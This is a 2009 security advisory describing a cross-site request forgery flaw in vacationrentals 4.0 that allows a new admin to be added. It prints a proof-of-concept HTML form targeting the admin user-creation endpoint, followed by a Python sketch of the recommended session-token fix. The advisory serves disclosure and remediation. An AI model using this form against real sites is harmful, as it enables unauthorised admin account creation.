Vacationrentals ~ XSRF Vuln. | Cyber-Warrior Information Technology's World
Article
Author: Bug Researchers/CWH1RLPOOL
Date: 13.09.2009 21:08:34
< ------------------- header data start ------------------- >
#############################################################
# Application Name : vacationrentals
# Version : 4.0
# Vulnerable Type : XSRF
# Infection : A new admin can be added.
# Bug Fix Advice : A session key (session token) should be added to the form
# Author : CWH1RLPOOL ~ Bug Researchers
#############################################################
< ------------------- header data end of ------------------- >

< -- bug code start -- >
<form id="http://www.site.com/[path]/admin/users_add" method="post" action="http://www.site.com/[path]/admin/users/add" enctype="multipart/form-data">
<input type="hidden" name="profile_logo" id="profile_logo" value="" />
<input class="text" type="text" id="user_name" name="user_name" value="" />
<input class="text" type="text" id="email" name="email" value="" />
<input class="text" type="password" id="password" name="password" />
<input class="text" type="password" id="retype_password" name="retype_password" />
<input class="text" type="text" id="profile_full_name" name="profile_full_name" value="" />
<input class="text" type="text" id="profile_phone1" name="profile_phone1" value="" />
<input class="text" type="text" id="profile_phone2" name="profile_phone2" value="" />
<input class="text" type="text" id="profile_fax" name="profile_fax" value="" />
<input class="text" type="text" id="profile_spoken_languages" name="profile_spoken_languages" value="" />
<input class="text" type="text" id="profile_web_address" name="profile_web_address" value="" />
<input type="file" id="profile_logo_upload" name="profile_logo_upload" />
<input class="btn-orange" type="submit" value="Add user" id="submit" name="submit" /><div class="btn-orange-end"> </div>
</form>
< -- bug code end of -- >
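
The fix the advisory recommends (a session token in the form) can be sketched as follows. This is an added example, not code from the advisory or from the vacationrentals application; the field name `csrf_token`, the key handling and all function names are assumptions, and only the `/admin/users/add` path and `user_name` field come from the form above.

```python
import hashlib
import hmac
import secrets

# Assumption: a per-deployment secret; a real application loads it from protected config.
SERVER_KEY = secrets.token_bytes(32)

def new_session_id() -> str:
    """Random session identifier, as would be stored in the admin's session cookie."""
    return secrets.token_urlsafe(32)

def issue_token(session_id: str) -> str:
    """Bind the form token to the session with HMAC-SHA256 (no server-side token store)."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()

def token_is_valid(session_id: str, submitted) -> bool:
    """Constant-time check; missing, empty or non-string values are rejected."""
    if not isinstance(submitted, str) or not submitted:
        return False
    expected = issue_token(session_id).encode()
    return hmac.compare_digest(expected, submitted.encode())

def render_add_user_form(session_id: str) -> str:
    """Add-user form (reduced to one field) with the token as a hidden input."""
    return (
        '<form method="post" action="/admin/users/add">\n'
        f'<input type="hidden" name="csrf_token" value="{issue_token(session_id)}" />\n'
        '<input type="text" name="user_name" />\n'
        '<input type="submit" name="submit" value="Add user" />\n'
        '</form>'
    )

def handle_add_user(session_id: str, form: dict, users: list):
    """POST handler: verify the token before any state change. Returns (status, body)."""
    if not token_is_valid(session_id, form.get("csrf_token")):
        return 403, "missing or invalid session token"
    name = form.get("user_name", "")
    if not name:
        return 400, "user_name required"
    users.append(name)
    return 200, "user added"

if __name__ == "__main__":
    sid, users = new_session_id(), []  # constructed session and user store
    # A cross-site POST carries the session cookie but not the token: rejected.
    print(handle_add_user(sid, {"user_name": "x"}, users))
    # A POST from the application's own rendered form carries the token: accepted.
    print(handle_add_user(sid, {"user_name": "editor", "csrf_token": issue_token(sid)}, users))
```

Because the token is derived from the session identifier, a page on another origin cannot supply it, while the application's own form always does.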